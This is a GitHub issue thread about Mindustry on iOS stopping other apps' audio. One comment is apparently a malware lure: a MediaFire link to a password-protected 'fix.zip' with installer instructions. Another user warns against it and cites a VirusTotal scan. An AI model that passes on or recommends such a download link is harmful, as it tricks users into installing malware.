### ISSUE TITLE
Takes over sound even when disabled 

### ISSUE THREAD

**Issue by wahlstedtw** [Anuken/Mindustry#10151]
### Platforms

iOS

### Build

146

### Issue

When the game is opened it turns off all other sounds. I’d like to be able to listen to music or an audio book while playing. 

### Steps to reproduce

Play something with sound, Spotify, audible, YouTube. Open the game and the audio stops. Disable sound in the menu exit the game and try again. The external audio stops. 

### Submission

- [X] I have updated to the latest release (https://github.com/Anuken/Mindustry/releases) to make sure my issue has not been fixed.
- [X] I have searched the closed and open issues to make sure that this problem has not already been reported.
- [X] I am not using Foo's Client, and have made sure the bug is not caused by mods I have installed.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wahlstedtw** [comment]
I’m not seeing that on iOS. When I open the game I don’t see an installer
menu.


Thanks,

Walter

**Comment by broganeuquoixe** [comment]
Please do ***not*** download and/or run that file.
https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

The link to the comment it mentions is not valid https://github.com/Anuken/Mindustry/issues/10151#issuecomment-2309582197
I don't know how they managed to spoof the github e-mail.

You might also want to see if your email has been leaked: https://haveibeenpwned.com/

**Comment by wahlstedtw** [comment]
I thought it was strange. It seems that the email originated from
reply.github.com. Which is odd.


Thanks,

Walter

**Comment by Anuken** [comment]
This is managed by the audio library I'm using, I'm not aware of a way to make it play audio differently and I have no plans to support this.
